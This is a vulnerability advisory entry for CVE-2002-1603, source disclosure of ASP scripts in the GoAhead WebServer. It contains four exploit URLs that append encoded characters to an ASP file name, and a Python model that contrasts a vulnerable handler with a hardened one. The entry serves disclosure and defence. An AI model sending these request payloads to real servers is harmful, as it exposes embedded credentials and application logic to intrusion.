GoAhead Webserver ASP脚本文件源代码泄露漏洞

Vulnerability ID: 1107137    Type: Other
Published: 2002-12-17    Updated: 2009-02-10
CVE: CVE-2002-1603    CNNVD ID: CNNVD-200202-008
Platform: Windows    CVSS score: 5.0
|Source
https://www.exploit-db.com/exploits/23446
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200202-008
|Details
GoAhead WebServer is a small embedded web server from the US company Embedthis, designed to be embedded in devices and applications. GoAhead WebServer fails to adequately sanitize HTTP requests, so a remote attacker can obtain the source code of ASP scripts. GoAhead WebServer executes ASP files; if the attacker appends URL-encoded characters such as '%00', '%2f', '%5c' or a trailing '/' to the name of an ASP file, the server returns a response containing the script's source instead of executing it. An attacker can use the disclosed source (embedded credentials, paths, application logic) to mount further attacks on the system.
|Exploit
source: http://www.securityfocus.com/bid/9239/info

A vulnerability in GoAhead webserver may result in the disclosure of the source code of ASP script files. The vulnerability occurs because the application fails to sanitize HTTP requests.

An attacker can append certain characters to the end of an HTTP request for a specific ASP file. As a result, GoAhead webserver will disclose the contents of the requested ASP script file to the attacker.

This issue affects GoAhead 2.1.7 and earlier; the 2.1.8 release notes (see References) record the fix. The last URL below is the unmodified request that is executed normally; the four before it are the variants that return the script source:

http://www.example.com/asp.asp%00
http://www.example.com/asp.asp%2f
http://www.example.com/asp.asp%5c
http://www.example.com/asp.asp/
http://www.example.com/asp.asp
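As an added illustration (not GoAhead's code and not part of the advisory above), the following Python script models the request-handling mistake these URLs exploit: the decision "is this an ASP file?" is taken on the raw request path, while the file is opened with a decoded path through an API that tolerates trailing junk. The vulnerable handler, the NUL-truncation and trailing-separator stripping it emulates, and the document root it builds are all hypothetical assumptions made for the example. The hardened handler shows the fix a practitioner would want: decode and canonicalise once, reject characters that can never appear in a legal path, and make both the dispatch decision and the file open from the same canonical string.

```python
# Added example (not GoAhead's own code): a model of the dispatch-vs-open
# mismatch behind CVE-2002-1603, beside a hardened handler.
import os
import tempfile
from urllib.parse import unquote

# Constructed document root containing one ASP file (test fixture).
DOCROOT = os.path.realpath(tempfile.mkdtemp())
ASP_SOURCE = b'<% Response.Write("db password = hunter2") %>'
with open(os.path.join(DOCROOT, "asp.asp"), "wb") as f:
    f.write(ASP_SOURCE)

# The five request forms from the advisory, as URL paths.
VARIANTS = ["/asp.asp%00", "/asp.asp%2f", "/asp.asp%5c", "/asp.asp/", "/asp.asp"]


def vulnerable_serve(request_path):
    """Hypothetical pre-fix behaviour: dispatch on the RAW path, open leniently."""
    if request_path.endswith(".asp"):
        return "ASP-ENGINE"          # script executed; source never leaves the box
    # Static-file branch: decode, then emulate a lenient open() that truncates at
    # NUL (C fopen) and ignores a trailing separator (assumed platform behaviour).
    decoded = unquote(request_path)
    decoded = decoded.split("\x00", 1)[0].rstrip("/\\")
    fs_path = os.path.join(DOCROOT, decoded.lstrip("/"))
    try:
        with open(fs_path, "rb") as fh:
            return fh.read()         # the .asp source is served as a plain file
    except OSError:
        return "404 Not Found"


def hardened_serve(request_path):
    """Canonicalise once; dispatch and open from the same canonical path."""
    decoded = unquote(request_path)
    if "\x00" in decoded or "\\" in decoded:
        return "400 Bad Request"     # never legal in a URL path component
    canonical = os.path.normpath("/" + decoded.lstrip("/"))   # collapses //, ., ..
    fs_path = os.path.realpath(os.path.join(DOCROOT, canonical.lstrip("/")))
    if os.path.commonpath([fs_path, DOCROOT]) != DOCROOT:
        return "403 Forbidden"       # escaped the document root via ".."
    if decoded.endswith("/") and not os.path.isdir(fs_path):
        return "404 Not Found"       # "asp.asp/" names a directory; none exists
    if fs_path.lower().endswith(".asp"):
        return "ASP-ENGINE"          # decided on the canonical name, not the raw URL
    try:
        with open(fs_path, "rb") as fh:
            return fh.read()
    except OSError:
        return "404 Not Found"


def leaks_source(handler):
    """Return the request variants for which `handler` discloses the ASP source."""
    return [v for v in VARIANTS if handler(v) == ASP_SOURCE]


if __name__ == "__main__":
    for name, handler in (("vulnerable", vulnerable_serve), ("hardened", hardened_serve)):
        for v in VARIANTS:
            print(f"{name:10s} {v:14s} -> {handler(v)!r}")
    print("vulnerable leaks on:", leaks_source(vulnerable_serve))
    print("hardened leaks on:  ", leaks_source(hardened_serve))
```

The model reproduces the advisory exactly: the four suffixed variants slip past the raw-path extension check and come back as file contents, while the plain request is executed. Any fix that only adds the four observed suffixes to a blocklist repeats the original mistake; the durable property is that the string the dispatcher inspects is the string the filesystem opens.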
|References

Source: US-CERT Vulnerability Note VU#975041
Name: VU#975041
Link: http://www.kb.cert.org/vuls/id/975041
Source: US-CERT Vulnerability Note VU#124059
Name: VU#124059
Link: http://www.kb.cert.org/vuls/id/124059
Source: XF
Name: goahead-script-source-disclosure(10885)
Link: http://xforce.iss.net/xforce/xfdb/10885
Source: BID
Name: 9239
Link: http://www.securityfocus.com/bid/9239
Source: www.procheckup.com
Link: http://www.procheckup.com/PDFs/ProCheckUp_Vulns_2002.pdf
Source: www.kb.cert.org
Link: http://www.kb.cert.org/vuls/id/RGII-7MWKZ3
Source: SECTRACK
Name: 1005820
Link: http://securitytracker.com/id?1005820
Source: rockwellautomation.custhelp.com
Link: http://rockwellautomation.custhelp.com/cgi-bin/rockwellautomation.cfg/php/enduser/std_adp.php?p_faqid=57729
Source: data.goahead.com (GoAhead 2.1.8 release notes, fix entry)
Link: http://data.goahead.com/Software/Webserver/2.1.8/release.htm#bug-with-urls-like-asp
Source: aluigi.altervista.org
Link: http://aluigi.altervista.org/adv/goahead-adv3.txt
Source: OSVDB
Name: 13295
Link: http://www.osvdb.org/13295
Source: SECUNIA
Name: 7741
Link: http://secunia.com/advisories/7741